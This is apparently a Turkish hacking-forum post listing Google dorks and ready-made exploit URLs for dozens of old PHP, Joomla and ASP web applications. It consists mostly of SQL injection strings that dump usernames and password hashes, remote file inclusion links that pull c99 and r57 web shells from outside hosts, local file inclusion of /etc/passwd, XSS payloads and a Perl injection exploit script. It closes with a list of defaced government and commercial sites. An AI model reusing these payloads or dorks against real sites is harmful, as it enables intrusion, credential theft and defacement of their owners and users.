toplist.php?f=toplist_top10&phpbb_root_path=http://kobaytm.3000mb.com/c99.txt?
1
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : -‘name Kose_Yazilari op viewarticle artid’-
Google arama : -‘name Kose_Yazilari op printpage artid’-
Site sonuna : modules.php?name=-“KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name=”KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: “inurl:/plugins/wordtube”
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Html’den sonrasına kendi shell adresiniz gerekli.
Joomla” Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=7…m3na_authors–
USER
http://www.xxx.com/news.php?newsid=7…m3na_authors–
Com-Actualite Açığı
Google Arama : allinurl: “com_actualite”
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:-/com_mtree/-
Site sonuna : http://%5Btarget%5D/%5Bmambo_path%5D/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/%5Bpath%5D/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : “com_lmo”
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path.-/administrator/components/com_lmo/-;
$lmo_url=$mosConfig_live_site.-/administrator/components/com_lmo/-;
Com-PonyGallery Açığı
Google Arama : inurl:”index.php?option=com_ponygallery”
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:-/index.php?option=com_rsfiles”
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:”com_joomlaradiov5″
Site Sonuna : http://www.site.com/administrator/co…/c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : “com_joomlaflashfun”
Site Sonuna : http://xxx.net/2007/administrator/co…fig_live_site=%5Battacker%5D
Carousel Flash Image Açığı
Google Arama : inurl:”com_jjgallery
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
WebLosning Açığı
Dork : allinurl: “index2.php?id”
Exploide
1 http://www.target.dk/index2.php?id=-…brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2…ugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-…ugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-…ugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Açığı
Dork: “Powered by: MFH v1”
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+– to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+– to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+– to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : “Web Group Communication Center”
Exploit:
XSS:
http://%5Btarget%5D/%5Bpath%5D/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: “powered by zomplog”
Exploit:
http://localhost/path/upload/force_d…e_download.php
Xcart Rfi Açığı
Google dork : “X-CART. Powerful PHP shopping cart software”
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_comprofiler”
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz…
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat_…x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc…Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : “CaLogic Calendars V1.2.2”
POC : http://localhost/%5B******_PATH%5D/userreg.php?langsel={SQL}
Example : http://localhost/%5B******_PATH%5D/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)–
Powered By PHPizabi Açığı
Dork: “Powered by PHPizabi v0.848b C1 HFP1″
Exploit:
http://localhost/izabi/system/cache/…s/id_shell.php
Example:
http://localhost/izabi/system/image…..php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:”classifide_ad.php”
Exploide:
http://site.com/classifide_ad.php?it…assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: “Powered by Novus”
İnformation server:
http://%5Bnovus%5D/notas.asp?nota_id=1+a…t(int,db_name())
http://%5Bnovus%5D/notas.asp?nota_id=1+a…nt,system_user)
http://%5Bnovus%5D/notas.asp?nota_id=1+a…@servername)–
http://%5Bnovus%5D/notas.asp?nota_id=1+a…t,@@version)–
Com-Mgm Açığı
Google Dork: inurl:”com_mgm”
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Açığı
Dork: allinurl: “com_astatspro”
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent=…ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/…
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print -\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n”;
print –
written by ka0x – ka0x01[at]gmail.com\n”;
print –
usage: perl $0 [host]\n”;
print –
example: http://host.com/cpDynaLinks\n”;
exit(1);
}
print -\n
connecting in $host…\n”;
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host.-/category.php?category=-1’/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*-);
if ($go->content =~ m/____(.*?)____/ms) {
print -$1\n”;
} else {
print -\n[-] exploit failed\n”;
}
Gelen sayfada “kaynağı görüntüle”yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm…hp?gszAppPath=%5BEvilScript%5D
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm…hp?gszAppPath=%5BEvilScript%5D
Admidio 1.4.8 RFI Açığı
Dork : “Admidio Team”
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/…efault_folder=
ezContents CMS Açığı
Dork: “ezContents CMS Version 2.0.0”
Exploits:
http://site.com/%5Bpatch%5D/showdetails.php?contentname=–/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/%5Bpatch%5D/printer.php?article=-/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: “inurl:Powered by SoftbizScripts” veya “Subscribe Newsletter”
Exploit: http://www.ssss.com/hostdirectory/se…php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin–
****** Açığıdır…
ProfileCMS v1.0 Açığı
Dork: “Powered By ProfileCMS v1.0” veya “Total Generators & Widgets”
Exploit: http://target.com/index.php?app=prof…x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
http://target.org/index.php?app=vide…a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arca…a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arca…f6574632f70617 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Açığı
Dork: : “option=com_rsgallery” veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users–
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Kmita Tell Friend Açığı
Dork: “Powered by Kmita Tell Friend” veya “allinurl:/kmitat/-
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : “allinurl:viewfaqs.php?cat=-
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers–
Days-Booking Açığı
Dork: “allinurl:index.php?user=daysbooking”
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin–&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11–
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : “BlogMe PHP created by Gamma Scripts”
Exploit : http://localhost/%5BBlogMe_path%5D/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)–
veya
http://localhost/%5BBlogMe_path%5D/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7–
ASPapp KnowledgeBase Açığı
Dork 1 – content_by_cat.asp?contentid -‘catid’-
Dork 2 – content_by_cat.asp? -‘catid’-
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1′ UNION SELECT TOP 1 convert(int, password%2b’%20x’) FROM EMAGIC_LOGINS where username=-‘sa’–
vlBook 1.21 ****** Açığı
****** Download : http://home.vlab.info/vlbook_1.21.zip
DORK : “Powered by vlBook 1.21″
XSS Address : http://example/?l=- <******>alert(‘xss’)</******>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:”modules.php?name”print
DORK 2 : allinurl:”modules.php?name=”Hikaye”
DORK 3: allinurl:”modules.php?name=”Fikralar”
DORK 4: allinurl:”modules.php?name=”bilgi”
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Com_JoomlaFlashfun Açığı
Dork: “com_joomlaflashfun”
Example:
http://xxx.net/2007/administrator/co…fig_live_site=%5Bxxxx%5D
Powered By The Black Lily 2007 Açığı
Dork : “Powered By The Black Lily 2007″
EXPLOIT:
http://victim.com/ar/products.php?cl…username%20fro m%20admin/*
veya
http://victim.com/en/products.php?cl…username%20fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator/…absolute_path=%5Bevilcode%5D
Rmsoft GS 2.0 Açığı
Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:”com_na_content”
DORK 2 : allinurl:”com_na_bible”
DORK 3 : allinurl:”com_na_events”
DORK 4 : allinurl:”com_na_content”
DORK 5 : allinurl:”com_na_feedback”
DORK 6 : allinurl:”com_na_mydocs”
DORK 7 : allinurl:”com_na_churchmap”
DORK 8 : allinurl:”com_na_bibleinfo”
DORK 9 : allinurl:”com_na_dbs”
DORK 10 : allinurl:”com_na_udm”
DORK 11 : allinurl:”com_na_qforms”
DORK 12 : allinurl:”com_na_gallery2″
DORK 13 : allinurl:”com_na_publicrss”
DORK 14 : allinurl:”index.php?kwd”
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: “Review ******-, “Phil Taylor”
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:”index.php?option=com_portfolio”
Exploit:
http://site.com/index.php?option=com…rId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: “com_astatspro”
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The ******** has moved <A HREF=”admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator”>here</A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : “Powered by phpBB © 2001, 2006 phpBB Group” veya “Modified by Fully Modded phpBB © 2002, 2006”
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: “Easy-Clanpage v2.2″
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
BM Classifieds Açığı
Dork 1 : -‘showad.php?listingid=–
Dork 2 : -‘pfriendly.php?ad=–
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : — webboard question.asp QID’-
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20′;-;
Com-Noticias Açığı
DorK : -‘com_noticias’-
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork – -‘links.asp?CatId’-
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
http://www.xxx.com/path/login.asp?re…Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :”modules/viso”
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Bookmarkx ****** Açığı
DorK 1 : “2007 BookmarkX ******-
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :”index.php?menu=showtopic”
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users–
XSS VULN
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 1
1 1
0 [+] Site : Trevvort Wgt – Can Arı 0
1 [+] 1
0 0
1 #################################### 1
0 Security is just illusion 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title : Simple Gallery 2.2 XSS / HTML Inject Vulnerability
| # Author : trevvort
| # email : tkmmedya@gmail.coö
| # Dork : Simple Gallery 2.2 © http://www.celerondude.com
| # Tested on: windows 8.1
| # Download : http://www.celerondude.com
========================================================================
poc:
TR GOV – BANK HACKED !
http://www.hacilarmuftulugu.gov.tr/?pnum=10&pt=TRevvorT-WhiteWeasel
http://www.zone-h.org/mirror/id/25198484
http://z0n.org/mirror/id/87373
http://www.incirliovamuftulugu.gov.tr/?pnum=10&pt=TRevvorT+WhiteWeasel
http://www.zone-h.org/mirror/id/25198535
http://z0n.org/mirror/id/87374
http://www.aydiniskur.gov.tr/?pnum=10&pt=TRevvorT+WhiteWeasel
http://www.zone-h.org/mirror/id/25198550
http://z0n.org/mirror/id/87375
http://www.inovasyonel.com/?pnum=10&pt=TRevvorT-WhiteWeasel
http://www.zone-h.org/mirror/id/25198588
http://z0n.org/mirror/id/87379
http://talasmuftulugu.gov.tr/?s=TRevvorT-WhiteWeasel
http://www.zone-h.org/mirror/id/25198418
http://z0n.org/mirror/id/87372
http://z0n.org/mirror/id/87125
http://www.zone-h.org/mirror/id/25196238
http://z0n.org/mirror/id/87097
http://z0n.org/mirror/id/87099
http://z0n.org/mirror/id/87100
http://golgeler.net/view-%3E351323
http://www.zone-h.org/mirror/id/25197047
http://mirror-az.com/defacements/id/863827
ARAP ÇARSI SITESI HACKED
http://kuwait.souq.com/kw-en/ScorFire+TRevvorT/s/
http://golgeler.net/view-%3E350427
####################################
http://saudi.souq.com/sa-ar/ScorFire+TRevvorT/s/
http://golgeler.net/view-%3E350444
####################################
http://egypt.souq.com/eg-ar/ScorFire+TRevvorT/s/
http://golgeler.net/view-%3E350447
####################################
http://uae.souq.com/ae-ar/ScorFire+TRevvorT/s/
http://golgeler.net/view-%3E350449
TRevvorT WGT / WHITE WEASEL 
